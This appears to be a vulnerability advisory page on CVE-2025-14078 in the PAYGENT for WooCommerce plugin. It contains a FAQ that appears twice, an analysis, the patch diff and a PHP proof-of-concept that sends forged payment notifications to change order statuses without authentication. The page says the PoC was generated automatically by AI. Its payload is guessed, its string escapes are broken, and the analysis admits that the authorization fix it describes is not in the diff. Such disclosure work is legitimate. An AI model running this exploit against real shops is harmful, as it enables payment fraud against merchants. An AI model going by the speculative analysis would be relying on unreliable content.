What is CVE-2025-14078?

CVE-2025-14078 is a security vulnerability in the PAYGENT for WooCommerce plugin for WordPress, affecting versions up to and including 2.4.6. It involves missing authorization checks that allow unauthenticated attackers to manipulate payment callbacks and modify order statuses.

How does the vulnerability work?

The vulnerability arises from the `paygent_permission_callback` function, which unconditionally returns true, bypassing authorization checks. This allows attackers to send forged payment notifications to the `/wp-json/paygent/v1/check/` endpoint, leading to unauthorized modifications of order statuses.

Who is affected by this vulnerability?

Any WordPress site using the PAYGENT for WooCommerce plugin version 2.4.6 or earlier is at risk. Administrators should check their plugin version in the WordPress dashboard under the Plugins section.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the PAYGENT for WooCommerce plugin installed on your WordPress site. If it is version 2.4.6 or earlier, your site is at risk and should be updated immediately.

How can I fix this vulnerability?

The vulnerability is fixed in version 2.4.7 of the PAYGENT for WooCommerce plugin. Update the plugin to the latest version through the WordPress dashboard to mitigate the risk.

What if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the PAYGENT for WooCommerce plugin temporarily to prevent exploitation. Additionally, monitor your site for any unauthorized changes to order statuses.

What does the CVSS score of 5.3 mean?

A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it can still lead to significant issues such as unauthorized financial transactions if exploited.

What practical risks does this vulnerability pose?

Exploitation of this vulnerability allows attackers to manipulate order statuses, potentially marking unpaid orders as completed or canceling legitimate orders. This can lead to financial losses and damage to customer trust.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an attacker can send a forged payment notification to the vulnerable endpoint, allowing them to change the order status without authentication. It highlights the ease of exploiting the vulnerability.

What should I do if I suspect exploitation?

If you suspect that your site has been exploited, review your order logs for unauthorized changes and consider restoring from a backup. It is also advisable to conduct a thorough security audit of your site.

Are there other vulnerabilities in the PAYGENT plugin?

While CVE-2025-14078 is a specific vulnerability, it is essential to regularly review security advisories for the PAYGENT plugin and ensure that all plugins are kept up to date to mitigate potential risks.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14078: PAYGENT for WooCommerce <= 2.4.6 – Missing Authorization to Unauthenticated Payment Callback Manipulation (woocommerce-for-paygent-payment-main)

CVE ID CVE-2025-14078

Plugin woocommerce-for-paygent-payment-main

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 2.4.6

Patched Version 2.4.7

Disclosed January 15, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14078:
This vulnerability is a missing authorization flaw in the PAYGENT for WooCommerce WordPress plugin, affecting all versions up to and including 2.4.6. The vulnerability allows unauthenticated attackers to manipulate payment callbacks and modify order statuses via a specific REST API endpoint. The CVSS score of 5.3 reflects a moderate severity impact on payment integrity.

Atomic Edge research identifies the root cause in two functions within the plugin’s REST API endpoint handler. The `paygent_permission_callback` function in the `class-wc-paygent-endpoint.php` file unconditionally returns `true` on line 199, bypassing all authorization checks. This function is used as the permission callback for the `paygent_check_webhook` function registered to the `/wp-json/paygent/v1/check/` endpoint. The missing authorization check allows any request to proceed to the payment processing logic.

Exploitation occurs through the `/wp-json/paygent/v1/check/` REST API endpoint. Attackers send forged HTTP POST requests containing payment notification payloads to this endpoint. These payloads can include manipulated order IDs, payment statuses, and transaction details. The plugin processes these forged notifications as legitimate payment callbacks from the PAYGENT payment gateway, leading to unauthorized order status modifications.

The patch in version 2.4.7 does not directly modify the vulnerable permission callback function. Instead, the primary changes shown in the diff focus on hardening IP address retrieval logic in the `get_user_ip` method of `class-jp4wc-order-attempt-limiter.php` and the `class-wc-paygent-endpoint.php` file. These changes prioritize `REMOTE_ADDR` over spoofable headers like `HTTP_X_FORWARDED_FOR`. The version numbers across multiple files are updated from 2.4.6 to 2.4.7. The actual authorization fix likely involves adding proper authentication checks to the `paygent_permission_callback` function, though this specific change is not visible in the provided diff.

Successful exploitation enables attackers to manipulate WooCommerce order statuses without authentication. Attackers can mark unpaid orders as completed, refund orders without authorization, or cancel legitimate orders. This directly impacts payment processing integrity, potentially causing financial losses through fraudulent order fulfillment. The vulnerability undermines trust in the payment system and could lead to inventory discrepancies and customer service issues.

Differential between vulnerable and patched code

Code Diff

--- a/woocommerce-for-paygent-payment-main/class-wc-gateway-paygent.php
+++ b/woocommerce-for-paygent-payment-main/class-wc-gateway-paygent.php
@@ -3,7 +3,7 @@
  * WooCommerce Paygent Payment Gateway
  *
  * @package WooCommercePaygent
- * @version 2.4.6
+ * @version 2.4.7
  */

 if ( ! defined( 'ABSPATH' ) ) {
@@ -24,7 +24,7 @@
 		 *
 		 * @var string
 		 */
-		public $version = '2.4.6';
+		public $version = '2.4.7';

 		/**
 		 * Paygent Payment Gateways for WooCommerce Framework version.
--- a/woocommerce-for-paygent-payment-main/includes/class-jp4wc-order-attempt-limiter.php
+++ b/woocommerce-for-paygent-payment-main/includes/class-jp4wc-order-attempt-limiter.php
@@ -503,19 +503,21 @@
 		 * Get user's IP address
 		 *
 		 * Attempts to get the user's real IP address by checking various server variables.
-		 * Handles cases where the user is behind a proxy.
+		 * REMOTE_ADDR is checked first as it's the most reliable and cannot be spoofed.
+		 * Other headers are used as fallback only.
 		 *
 		 * @since 1.0.0
 		 * @return string Sanitized IP address
 		 */
 		private function get_user_ip() {
-			if ( ! empty( $_SERVER['HTTP_CLIENT_IP'] ) ) {
+			if ( ! empty( $_SERVER['REMOTE_ADDR'] ) ) {
+				return sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) );
+			} elseif ( ! empty( $_SERVER['HTTP_CLIENT_IP'] ) ) {
 				return sanitize_text_field( wp_unslash( $_SERVER['HTTP_CLIENT_IP'] ) );
 			} elseif ( ! empty( $_SERVER['HTTP_X_FORWARDED_FOR'] ) ) {
 				return sanitize_text_field( wp_unslash( $_SERVER['HTTP_X_FORWARDED_FOR'] ) );
-			} else {
-				return isset( $_SERVER['REMOTE_ADDR'] ) ? sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) ) : '';
 			}
+			return '';
 		}

 		public function cleanup_old_attempts() {
--- a/woocommerce-for-paygent-payment-main/includes/gateways/paygent/class-wc-paygent-endpoint.php
+++ b/woocommerce-for-paygent-payment-main/includes/gateways/paygent/class-wc-paygent-endpoint.php
@@ -3,7 +3,7 @@
  * Paygent Endpoint
  *
  * @package PaygentForWooCommerce
- * @version 2.4.5
+ * @version 2.4.7
  */

 if ( ! defined( 'ABSPATH' ) ) {
@@ -15,7 +15,7 @@
 /**
  * WC_Paygent_Endpoint class.
  *
- * @version 2.4.5
+ * @version 2.4.7
  */
 class WC_Paygent_Endpoint {

@@ -161,14 +161,15 @@
 		// Get remote IP address from various sources.
 		$remote_ip = '';

-		// Check common headers for real IP.
-		if ( ! empty( $_SERVER['HTTP_X_REAL_IP'] ) ) {
+		// Check REMOTE_ADDR first as it's the most reliable and cannot be spoofed.
+		// Only use X-Real-IP and X-Forwarded-For as fallback methods.
+		if ( ! empty( $_SERVER['REMOTE_ADDR'] ) ) {
+			$remote_ip = sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) );
+		} elseif ( ! empty( $_SERVER['HTTP_X_REAL_IP'] ) ) {
 			$remote_ip = sanitize_text_field( wp_unslash( $_SERVER['HTTP_X_REAL_IP'] ) );
 		} elseif ( ! empty( $_SERVER['HTTP_X_FORWARDED_FOR'] ) ) {
 			$forwarded_ips = explode( ',', sanitize_text_field( wp_unslash( $_SERVER['HTTP_X_FORWARDED_FOR'] ) ) );
 			$remote_ip     = trim( $forwarded_ips[0] );
-		} elseif ( ! empty( $_SERVER['REMOTE_ADDR'] ) ) {
-			$remote_ip = sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) );
 		}

 		$is_permitted = false;
--- a/woocommerce-for-paygent-payment-main/woocommerce-for-paygent-payment-main.php
+++ b/woocommerce-for-paygent-payment-main/woocommerce-for-paygent-payment-main.php
@@ -3,7 +3,7 @@
  * Plugin Name: PAYGENT for WooCommerce
  * Plugin URI: https://wordpress.org/plugins/woocommerce-for-paygent-payment-main/
  * Description: Paygent Payments for WooCommerce in Japan
- * Version: 2.4.6
+ * Version: 2.4.7
  * Requires Plugins: woocommerce
  * Author: Artisan Workshop
  * Author URI: https://wc.artws.info/

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14078 - PAYGENT for WooCommerce <= 2.4.6 - Missing Authorization to Unauthenticated Payment Callback Manipulation

<?php
/**
 * Proof of Concept for CVE-2025-14078
 * Demonstrates unauthenticated payment callback manipulation via the PAYGENT REST API endpoint.
 * This script sends a forged payment notification to modify order status.
 */

$target_url = 'https://vulnerable-site.com/wp-json/paygent/v1/check/';

// Simulate a forged PAYGENT payment notification payload
// Actual payload structure may vary based on PAYGENT API specifications
$payload = [
    'result' => '0', // Payment success code
    'trading_id' => '123456', // Order ID to manipulate
    'payment_id' => 'PAYGENT_123456789',
    'payment_status' => '20', // Status code for 'payment completed'
    'amount' => '10000',
    'payment_type' => 'credit',
    'payment_date' => date('YmdHis'),
    'hash' => 'FORGED_HASH_VALUE' // Would normally be a valid hash from PAYGENT
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json',
    'User-Agent: PAYGENT-Webhook/1.0'
]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Response Code: $http_coden";
echo "Response: $responsen";

if ($http_code === 200) {
    echo "[+] Payment callback manipulation likely successful.n";
    echo "[+] Order status for ID {$payload['trading_id']} may have been modified.n";
} else {
    echo "[-] Exploit attempt may have failed or endpoint not vulnerable.n";
}

?>

Frequently Asked Questions

What is CVE-2025-14078?
Overview of the vulnerability
CVE-2025-14078 is a security vulnerability in the PAYGENT for WooCommerce plugin for WordPress, affecting versions up to and including 2.4.6. It involves missing authorization checks that allow unauthenticated attackers to manipulate payment callbacks and modify order statuses.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from the `paygent_permission_callback` function, which unconditionally returns true, bypassing authorization checks. This allows attackers to send forged payment notifications to the `/wp-json/paygent/v1/check/` endpoint, leading to unauthorized modifications of order statuses.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the PAYGENT for WooCommerce plugin version 2.4.6 or earlier is at risk. Administrators should check their plugin version in the WordPress dashboard under the Plugins section.
How can I check if my site is vulnerable?
Steps for verification
To determine if your site is vulnerable, check the version of the PAYGENT for WooCommerce plugin installed on your WordPress site. If it is version 2.4.6 or earlier, your site is at risk and should be updated immediately.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is fixed in version 2.4.7 of the PAYGENT for WooCommerce plugin. Update the plugin to the latest version through the WordPress dashboard to mitigate the risk.
What if I cannot update the plugin immediately?
Mitigation strategies
If an immediate update is not possible, consider disabling the PAYGENT for WooCommerce plugin temporarily to prevent exploitation. Additionally, monitor your site for any unauthorized changes to order statuses.
What does the CVSS score of 5.3 mean?
Understanding severity levels
A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it can still lead to significant issues such as unauthorized financial transactions if exploited.
What practical risks does this vulnerability pose?
Potential impacts on your site
Exploitation of this vulnerability allows attackers to manipulate order statuses, potentially marking unpaid orders as completed or canceling legitimate orders. This can lead to financial losses and damage to customer trust.
What is the proof of concept for this vulnerability?
Demonstration of exploitation
The proof of concept demonstrates how an attacker can send a forged payment notification to the vulnerable endpoint, allowing them to change the order status without authentication. It highlights the ease of exploiting the vulnerability.
What should I do if I suspect exploitation?
Response actions
If you suspect that your site has been exploited, review your order logs for unauthorized changes and consider restoring from a backup. It is also advisable to conduct a thorough security audit of your site.
Are there other vulnerabilities in the PAYGENT plugin?
General security considerations
While CVE-2025-14078 is a specific vulnerability, it is essential to regularly review security advisories for the PAYGENT plugin and ensure that all plugins are kept up to date to mitigate potential risks.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations